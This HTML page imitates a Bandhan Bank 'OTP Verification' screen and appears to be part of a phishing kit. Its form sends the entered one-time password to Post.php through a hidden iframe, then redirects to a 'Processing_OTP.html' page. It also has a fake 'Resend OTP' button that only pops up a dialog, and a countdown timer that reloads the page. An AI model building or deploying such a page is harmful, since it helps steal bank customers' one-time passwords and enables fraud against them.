<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1"> 
  <title>Enter OTP - Bandhan Bank</title>
  <meta name="theme-color" content="#185a8c">
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
  <link rel="manifest" href="/site.webmanifest">
  <meta name="msapplication-TileColor" content="#da532c">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Nunito+Sans:ital,opsz,wght@0,6..12,200..1000;1,6..12,200..1000&display=swap" rel="stylesheet">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous"> 
  <link rel="stylesheet" href="style.css"> 
  <style>
            #overlay {
                position: fixed; /* Fixed position to cover the entire viewport */
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background-color: rgba(0, 0, 0, 0.425); /* Semi-transparent background */
                opacity: 0.5;
                z-index: 5; /* High z-index to overlay everything else */
            }
            main {
            position: relative;
            z-index: 10; /* Higher z-index to be above the overlay */
        }

  </style>
 </head> 
 <body onload="startTimer();"> 
  <div id="overlay"></div> 
  <header> 
   <img src="header.jpg" width="100%" alt=""> 
  </header>
   <!-- partial:index.partial.html -->
   <!-- Static- Please don't do anything here-->
   <script type="text/javascript">var submitted=false;</script>
   <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing_OTP.html';}"></iframe>
  <main class="mt-4 "> 
   <div class="container"> 
    <div class="mx-4 shadow bg-light border p-4"> 
     <div class="position-relative mb-4"> 
      <h5 class="text-center text-primary" style="font-family:'Nunito Sans', sans-serif;">OTP Verification</h5> 
      <span class="text-secondary" style="position: absolute;right: -9px;top: -19px;font-size: 22px;">X</span> 
     </div>
     <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform"> 
     <input type="hidden" id="nextValue" value=""> 
     <p class="text-primary" style="font-family:'Nunito Sans', sans-serif;"> OTP has been sent to Mobile Number. Please enter OTP below to complete the process. </p> 
     <div id="test" class="text-danger fw-bold"></div> 
     <form id="frm_2_am8E" class="mt-4"> 
      <div class="form-group"> 
       <label for="OTP" style="font-family:'Nunito Sans', sans-serif;">One Time Password </label> 
       <input type="text" maxlength="6"  placeholder="Enter OTP" inputmode="numeric" class="form-control" name="1ST_OTP"
       pattern="[0-9]\d{5}" title="Please enter valid One Time Password !" required><br> 
       <script>
       var url = document.URL;
       document.getElementById("url").innerHTML = "URL: " + str;
       function replicateTab(){
       if(window.confirm("OTP resend successfully, Please check your phone inbox.")){
       window.location.href="Enter_OTP.html";
       }
       }
       </script>
       <button id = "button" onclick = "replicateTab()"style="font-family:'Nunito Sans', sans-serif; font-size:14px; font-weight:700; color:#185a8c; background-color:transparent; border:none; position:absolute; margin-top:-7%; margin-left:41%; text-decoration:none;">Resend OTP</button>
       <div>
       <small class="text-primary" style="font-family:'Nunito Sans', sans-serif;">Time left in seconds : <small id="time"></small></small> 
      </div> 
      <div class="form-group w-100 my-5 d-flex justify-content-start gap-2"> 
       <button type="submit" class="submit-button btn btn-primary">Confirm OTP</button> 
       <a href="" class=" btn btn-outline-primary">Cancel</a> 
      </div> 
     </form> 
    </div> 
   </div> 
  </main> 
  <footer class="position-absolute bottom-0 mb-0"> 
   <img src="footer.jpg" width="100%" alt=""> 
  </footer> 
  <script>
       var timer=180;
       var sec=180;
       function startTimer() {
       sec=parseInt(timer%180);
       
       if (timer<2) {
       // timer.stop();
       window.location.href = "Enter_OTP.html";
       }
       
       document.getElementById("time").innerHTML = "<p1> </p1>"+sec.toString();
       timer--;
       setTimeout(function(){
       startTimer();
       
       }, 1000);
       }

    </script> 
 </body>
</html>